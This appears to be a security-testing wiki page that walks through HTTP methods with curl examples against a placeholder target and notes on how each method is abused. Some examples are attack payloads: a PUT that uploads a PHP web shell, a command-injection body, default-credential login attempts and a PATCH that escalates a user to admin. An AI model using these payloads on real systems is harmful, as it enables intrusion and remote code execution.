Making HTTP Requests
Making HTTP Requests[edit | edit source]
Introduction[edit | edit source]
HTTP requests are used to interact with web servers by requesting data, submitting forms, uploading files, or modifying resources. Understanding how each method works enables deeper interaction with web applications and can expose misconfigurations or unintended functionality.
This page outlines how common HTTP methods are used in practice, with real-world examples suitable for exploration and testing.
GET[edit | edit source]
The GET method is used to retrieve data from a server. It appends parameters to the URL and leaves traces in logs and browser history.
Usage Example
curl 'http://target.site/profile?id=1337'
Notes
- Used for parameter enumeration (?id=1, ?id=2, ...)
- Reflected and stored XSS often triggered via GET
- Sensitive data in GET can be exposed in logs or referers
POST[edit | edit source]
The POST method submits data to the server in the request body. It’s used in login forms, registration, comment submission, and more.
Usage Example (Form Login)
curl -X POST http://target.site/login \ -H "Content-Type: application/x-www-form-urlencoded" \ --data "username=admin&password=admin"
Usage Example (JSON)
curl -X POST http://target.site/api \ -H "Content-Type: application/json" \ -d '{"cmd":"whoami"}'
Notes
- Hidden parameters or roles often sent in POST
- Commonly used for SQL injection and command injection
- Some endpoints accept both GET and POST (test both)
PUT[edit | edit source]
PUT is used to upload or replace resources. When enabled and not restricted, it may allow file upload attacks.
Usage Example (upload PHP shell)
curl -X PUT http://target.site/uploads/shell.php \ --data '<?php system($_GET["cmd"]); ?>'
Notes
- Rarely enabled on production servers
- Can be used to gain arbitrary file write if not locked down
- Test using OPTIONS method to check for support
DELETE[edit | edit source]
DELETE requests are meant to remove resources. While often blocked or protected, it can be misconfigured and abused.
Usage Example
curl -X DELETE http://target.site/api/users/42
Notes
- May not require authentication in misconfigured APIs
- If unauthenticated DELETE is accepted, privilege escalation or DoS may be possible
PATCH[edit | edit source]
PATCH modifies part of a resource instead of replacing the whole. Seen in APIs that allow editing.
Usage Example
curl -X PATCH http://target.site/api/user/42 \ -H "Content-Type: application/json" \ -d '{"role":"admin"}'
Notes
- Can be used to escalate privileges in improperly secured APIs
- Input validation should always be tested
HEAD[edit | edit source]
HEAD requests are identical to GET but return only headers. Useful for checking if a file exists or for recon.
Usage Example
curl -I http://target.site/admin.php
Notes
- Useful for testing resource existence without downloading content
- Can bypass some security tools that ignore HEAD requests
OPTIONS[edit | edit source]
OPTIONS asks the server what methods are allowed on a given endpoint.
Usage Example
curl -X OPTIONS http://target.site/api/
Notes
- Helps detect hidden endpoints or misconfigured CORS policies
- Can reveal support for PUT, DELETE, etc.
- Some APIs respond differently based on user-agent
TRACE[edit | edit source]
TRACE echoes the request back to the client. It can be abused in some edge-case attacks like Cross Site Tracing (XST).
Usage Example
curl -X TRACE http://target.site
Notes
- Rarely enabled
- If active, can reflect headers (e.g., cookies) in response
Common Headers to Use in Requests[edit | edit source]
Header | Description |
---|---|
Host | Target domain |
User-Agent | Client identity, can be spoofed |
Referer | Previous page, can be manipulated |
Origin | Cross-origin indicator (CORS) |
Authorization | Basic or Bearer tokens |
Content-Type | Declares body format (form, JSON, XML) |
Cookie | Session identifier injection |
X-Forwarded-For | Spoofed IP for bypassing IP-based restrictions |
Tools for Crafting Requests[edit | edit source]
Tool | Use Case | Notes |
---|---|---|
curl | All HTTP methods | Lightweight, scriptable |
httpie | Human-readable requests | Easier syntax than curl |
Burp Suite | Intercept & modify requests | GUI + repeater |
OWASP ZAP | Automated scanning + proxy | Supports scripting |
Postman | API testing & automation | GUI-based |
See also[edit | edit source]
- /HTTP_Protocols
- Headers
- Cookies_and_Sessions
- curl
- Bypassing_Authentication
- Content_Discovery